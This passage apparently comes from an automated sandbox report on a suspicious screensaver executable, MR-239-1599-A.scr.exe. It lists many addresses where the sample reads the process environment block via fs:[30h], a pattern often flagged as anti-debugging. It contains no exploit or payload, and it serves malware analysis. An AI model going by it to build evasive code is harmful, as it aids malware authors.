                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E59C mov eax, dword ptr fs:[00000030h]3_2_0152E59C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01524588 mov eax, dword ptr fs:[00000030h]3_2_01524588
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015145B1 mov eax, dword ptr fs:[00000030h]3_2_015145B1
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015145B1 mov eax, dword ptr fs:[00000030h]3_2_015145B1
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015705A7 mov eax, dword ptr fs:[00000030h]3_2_015705A7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015705A7 mov eax, dword ptr fs:[00000030h]3_2_015705A7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015705A7 mov eax, dword ptr fs:[00000030h]3_2_015705A7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151245A mov eax, dword ptr fs:[00000030h]3_2_0151245A
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015AA456 mov eax, dword ptr fs:[00000030h]3_2_015AA456
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E443 mov eax, dword ptr fs:[00000030h]3_2_0152E443
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E443 mov eax, dword ptr fs:[00000030h]3_2_0152E443
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E443 mov eax, dword ptr fs:[00000030h]3_2_0152E443
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E443 mov eax, dword ptr fs:[00000030h]3_2_0152E443
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E443 mov eax, dword ptr fs:[00000030h]3_2_0152E443
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E443 mov eax, dword ptr fs:[00000030h]3_2_0152E443
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E443 mov eax, dword ptr fs:[00000030h]3_2_0152E443
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E443 mov eax, dword ptr fs:[00000030h]3_2_0152E443
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014E645D mov eax, dword ptr fs:[00000030h]3_2_014E645D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151A470 mov eax, dword ptr fs:[00000030h]3_2_0151A470
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151A470 mov eax, dword ptr fs:[00000030h]3_2_0151A470
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151A470 mov eax, dword ptr fs:[00000030h]3_2_0151A470
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157C460 mov ecx, dword ptr fs:[00000030h]3_2_0157C460
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01528402 mov eax, dword ptr fs:[00000030h]3_2_01528402
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01528402 mov eax, dword ptr fs:[00000030h]3_2_01528402
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01528402 mov eax, dword ptr fs:[00000030h]3_2_01528402
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014EC427 mov eax, dword ptr fs:[00000030h]3_2_014EC427
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014EE420 mov eax, dword ptr fs:[00000030h]3_2_014EE420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014EE420 mov eax, dword ptr fs:[00000030h]3_2_014EE420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014EE420 mov eax, dword ptr fs:[00000030h]3_2_014EE420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01576420 mov eax, dword ptr fs:[00000030h]3_2_01576420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01576420 mov eax, dword ptr fs:[00000030h]3_2_01576420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01576420 mov eax, dword ptr fs:[00000030h]3_2_01576420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01576420 mov eax, dword ptr fs:[00000030h]3_2_01576420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01576420 mov eax, dword ptr fs:[00000030h]3_2_01576420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01576420 mov eax, dword ptr fs:[00000030h]3_2_01576420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01576420 mov eax, dword ptr fs:[00000030h]3_2_01576420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F04E5 mov ecx, dword ptr fs:[00000030h]3_2_014F04E5
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015AA49A mov eax, dword ptr fs:[00000030h]3_2_015AA49A
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015244B0 mov ecx, dword ptr fs:[00000030h]3_2_015244B0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F64AB mov eax, dword ptr fs:[00000030h]3_2_014F64AB
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157A4B0 mov eax, dword ptr fs:[00000030h]3_2_0157A4B0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01574755 mov eax, dword ptr fs:[00000030h]3_2_01574755
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532750 mov eax, dword ptr fs:[00000030h]3_2_01532750
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532750 mov eax, dword ptr fs:[00000030h]3_2_01532750
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157E75D mov eax, dword ptr fs:[00000030h]3_2_0157E75D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152674D mov esi, dword ptr fs:[00000030h]3_2_0152674D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152674D mov eax, dword ptr fs:[00000030h]3_2_0152674D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152674D mov eax, dword ptr fs:[00000030h]3_2_0152674D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F0750 mov eax, dword ptr fs:[00000030h]3_2_014F0750
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F8770 mov eax, dword ptr fs:[00000030h]3_2_014F8770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01520710 mov eax, dword ptr fs:[00000030h]3_2_01520710
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152C700 mov eax, dword ptr fs:[00000030h]3_2_0152C700
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F0710 mov eax, dword ptr fs:[00000030h]3_2_014F0710
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156C730 mov eax, dword ptr fs:[00000030h]3_2_0156C730
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152273C mov eax, dword ptr fs:[00000030h]3_2_0152273C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152273C mov ecx, dword ptr fs:[00000030h]3_2_0152273C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152273C mov eax, dword ptr fs:[00000030h]3_2_0152273C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152C720 mov eax, dword ptr fs:[00000030h]3_2_0152C720
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152C720 mov eax, dword ptr fs:[00000030h]3_2_0152C720
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FC7C0 mov eax, dword ptr fs:[00000030h]3_2_014FC7C0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015707C3 mov eax, dword ptr fs:[00000030h]3_2_015707C3
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F47FB mov eax, dword ptr fs:[00000030h]3_2_014F47FB
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F47FB mov eax, dword ptr fs:[00000030h]3_2_014F47FB
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157E7E1 mov eax, dword ptr fs:[00000030h]3_2_0157E7E1
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015127ED mov eax, dword ptr fs:[00000030h]3_2_015127ED
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015127ED mov eax, dword ptr fs:[00000030h]3_2_015127ED
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015127ED mov eax, dword ptr fs:[00000030h]3_2_015127ED
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159678E mov eax, dword ptr fs:[00000030h]3_2_0159678E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F07AF mov eax, dword ptr fs:[00000030h]3_2_014F07AF
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015A47A0 mov eax, dword ptr fs:[00000030h]3_2_015A47A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150C640 mov eax, dword ptr fs:[00000030h]3_2_0150C640
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01522674 mov eax, dword ptr fs:[00000030h]3_2_01522674
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152A660 mov eax, dword ptr fs:[00000030h]3_2_0152A660
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152A660 mov eax, dword ptr fs:[00000030h]3_2_0152A660
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B866E mov eax, dword ptr fs:[00000030h]3_2_015B866E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B866E mov eax, dword ptr fs:[00000030h]3_2_015B866E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532619 mov eax, dword ptr fs:[00000030h]3_2_01532619
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150260B mov eax, dword ptr fs:[00000030h]3_2_0150260B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150260B mov eax, dword ptr fs:[00000030h]3_2_0150260B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150260B mov eax, dword ptr fs:[00000030h]3_2_0150260B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150260B mov eax, dword ptr fs:[00000030h]3_2_0150260B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150260B mov eax, dword ptr fs:[00000030h]3_2_0150260B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150260B mov eax, dword ptr fs:[00000030h]3_2_0150260B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150260B mov eax, dword ptr fs:[00000030h]3_2_0150260B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E609 mov eax, dword ptr fs:[00000030h]3_2_0156E609
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F262C mov eax, dword ptr fs:[00000030h]3_2_014F262C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01526620 mov eax, dword ptr fs:[00000030h]3_2_01526620
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01528620 mov eax, dword ptr fs:[00000030h]3_2_01528620
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150E627 mov eax, dword ptr fs:[00000030h]3_2_0150E627
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0152A6C7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152A6C7 mov eax, dword ptr fs:[00000030h]3_2_0152A6C7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E6F2 mov eax, dword ptr fs:[00000030h]3_2_0156E6F2
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E6F2 mov eax, dword ptr fs:[00000030h]3_2_0156E6F2
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E6F2 mov eax, dword ptr fs:[00000030h]3_2_0156E6F2
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E6F2 mov eax, dword ptr fs:[00000030h]3_2_0156E6F2
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015706F1 mov eax, dword ptr fs:[00000030h]3_2_015706F1
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015706F1 mov eax, dword ptr fs:[00000030h]3_2_015706F1
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F4690 mov eax, dword ptr fs:[00000030h]3_2_014F4690
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F4690 mov eax, dword ptr fs:[00000030h]3_2_014F4690
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015266B0 mov eax, dword ptr fs:[00000030h]3_2_015266B0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152C6A6 mov eax, dword ptr fs:[00000030h]3_2_0152C6A6
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01570946 mov eax, dword ptr fs:[00000030h]3_2_01570946
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C4940 mov eax, dword ptr fs:[00000030h]3_2_015C4940
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01594978 mov eax, dword ptr fs:[00000030h]3_2_01594978
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01594978 mov eax, dword ptr fs:[00000030h]3_2_01594978
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157C97C mov eax, dword ptr fs:[00000030h]3_2_0157C97C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01516962 mov eax, dword ptr fs:[00000030h]3_2_01516962
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01516962 mov eax, dword ptr fs:[00000030h]3_2_01516962
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01516962 mov eax, dword ptr fs:[00000030h]3_2_01516962
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0153096E mov eax, dword ptr fs:[00000030h]3_2_0153096E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0153096E mov edx, dword ptr fs:[00000030h]3_2_0153096E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0153096E mov eax, dword ptr fs:[00000030h]3_2_0153096E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157C912 mov eax, dword ptr fs:[00000030h]3_2_0157C912
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014E8918 mov eax, dword ptr fs:[00000030h]3_2_014E8918
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014E8918 mov eax, dword ptr fs:[00000030h]3_2_014E8918
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E908 mov eax, dword ptr fs:[00000030h]3_2_0156E908
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E908 mov eax, dword ptr fs:[00000030h]3_2_0156E908
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0158892B mov eax, dword ptr fs:[00000030h]3_2_0158892B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157892A mov eax, dword ptr fs:[00000030h]3_2_0157892A
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015249D0 mov eax, dword ptr fs:[00000030h]3_2_015249D0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BA9D3 mov eax, dword ptr fs:[00000030h]3_2_015BA9D3
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015869C0 mov eax, dword ptr fs:[00000030h]3_2_015869C0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FA9D0 mov eax, dword ptr fs:[00000030h]3_2_014FA9D0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FA9D0 mov eax, dword ptr fs:[00000030h]3_2_014FA9D0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FA9D0 mov eax, dword ptr fs:[00000030h]3_2_014FA9D0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FA9D0 mov eax, dword ptr fs:[00000030h]3_2_014FA9D0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FA9D0 mov eax, dword ptr fs:[00000030h]3_2_014FA9D0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FA9D0 mov eax, dword ptr fs:[00000030h]3_2_014FA9D0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015229F9 mov eax, dword ptr fs:[00000030h]3_2_015229F9
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015229F9 mov eax, dword ptr fs:[00000030h]3_2_015229F9
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157E9E0 mov eax, dword ptr fs:[00000030h]3_2_0157E9E0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F09AD mov eax, dword ptr fs:[00000030h]3_2_014F09AD
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F09AD mov eax, dword ptr fs:[00000030h]3_2_014F09AD
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015789B3 mov esi, dword ptr fs:[00000030h]3_2_015789B3
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015789B3 mov eax, dword ptr fs:[00000030h]3_2_015789B3
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015789B3 mov eax, dword ptr fs:[00000030h]3_2_015789B3
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015029A0 mov eax, dword ptr fs:[00000030h]3_2_015029A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015029A0 mov eax, dword ptr fs:[00000030h]3_2_015029A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015029A0 mov eax, dword ptr fs:[00000030h]3_2_015029A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015029A0 mov eax, dword ptr fs:[00000030h]3_2_015029A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015029A0 mov eax, dword ptr fs:[00000030h]3_2_015029A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015029A0 mov eax, dword ptr fs:[00000030h]3_2_015029A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015029A0 mov eax, dword ptr fs:[00000030h]3_2_015029A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015029A0 mov eax, dword ptr fs:[00000030h]3_2_015029A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015029A0 mov eax, dword ptr fs:[00000030h]3_2_015029A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015029A0 mov eax, dword ptr fs:[00000030h]3_2_015029A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015029A0 mov eax, dword ptr fs:[00000030h]3_2_015029A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015029A0 mov eax, dword ptr fs:[00000030h]3_2_015029A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015029A0 mov eax, dword ptr fs:[00000030h]3_2_015029A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01520854 mov eax, dword ptr fs:[00000030h]3_2_01520854
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01502840 mov ecx, dword ptr fs:[00000030h]3_2_01502840
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F4859 mov eax, dword ptr fs:[00000030h]3_2_014F4859
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F4859 mov eax, dword ptr fs:[00000030h]3_2_014F4859
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157E872 mov eax, dword ptr fs:[00000030h]3_2_0157E872
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157E872 mov eax, dword ptr fs:[00000030h]3_2_0157E872
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01586870 mov eax, dword ptr fs:[00000030h]3_2_01586870
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01586870 mov eax, dword ptr fs:[00000030h]3_2_01586870
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157C810 mov eax, dword ptr fs:[00000030h]3_2_0157C810
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152A830 mov eax, dword ptr fs:[00000030h]3_2_0152A830
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159483A mov eax, dword ptr fs:[00000030h]3_2_0159483A
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159483A mov eax, dword ptr fs:[00000030h]3_2_0159483A
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01512835 mov eax, dword ptr fs:[00000030h]3_2_01512835
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01512835 mov eax, dword ptr fs:[00000030h]3_2_01512835
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01512835 mov eax, dword ptr fs:[00000030h]3_2_01512835
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01512835 mov ecx, dword ptr fs:[00000030h]3_2_01512835
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01512835 mov eax, dword ptr fs:[00000030h]3_2_01512835
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01512835 mov eax, dword ptr fs:[00000030h]3_2_01512835
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151E8C0 mov eax, dword ptr fs:[00000030h]3_2_0151E8C0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C08C0 mov eax, dword ptr fs:[00000030h]3_2_015C08C0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152C8F9 mov eax, dword ptr fs:[00000030h]3_2_0152C8F9
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152C8F9 mov eax, dword ptr fs:[00000030h]3_2_0152C8F9
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BA8E4 mov eax, dword ptr fs:[00000030h]3_2_015BA8E4
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F0887 mov eax, dword ptr fs:[00000030h]3_2_014F0887
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157C89D mov eax, dword ptr fs:[00000030h]3_2_0157C89D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159EB50 mov eax, dword ptr fs:[00000030h]3_2_0159EB50
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C2B57 mov eax, dword ptr fs:[00000030h]3_2_015C2B57
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C2B57 mov eax, dword ptr fs:[00000030h]3_2_015C2B57
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C2B57 mov eax, dword ptr fs:[00000030h]3_2_015C2B57
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C2B57 mov eax, dword ptr fs:[00000030h]3_2_015C2B57
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015A4B4B mov eax, dword ptr fs:[00000030h]3_2_015A4B4B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015A4B4B mov eax, dword ptr fs:[00000030h]3_2_015A4B4B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01586B40 mov eax, dword ptr fs:[00000030h]3_2_01586B40
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01586B40 mov eax, dword ptr fs:[00000030h]3_2_01586B40
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BAB40 mov eax, dword ptr fs:[00000030h]3_2_015BAB40
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01598B42 mov eax, dword ptr fs:[00000030h]3_2_01598B42
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014ECB7E mov eax, dword ptr fs:[00000030h]3_2_014ECB7E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156EB1D mov eax, dword ptr fs:[00000030h]3_2_0156EB1D
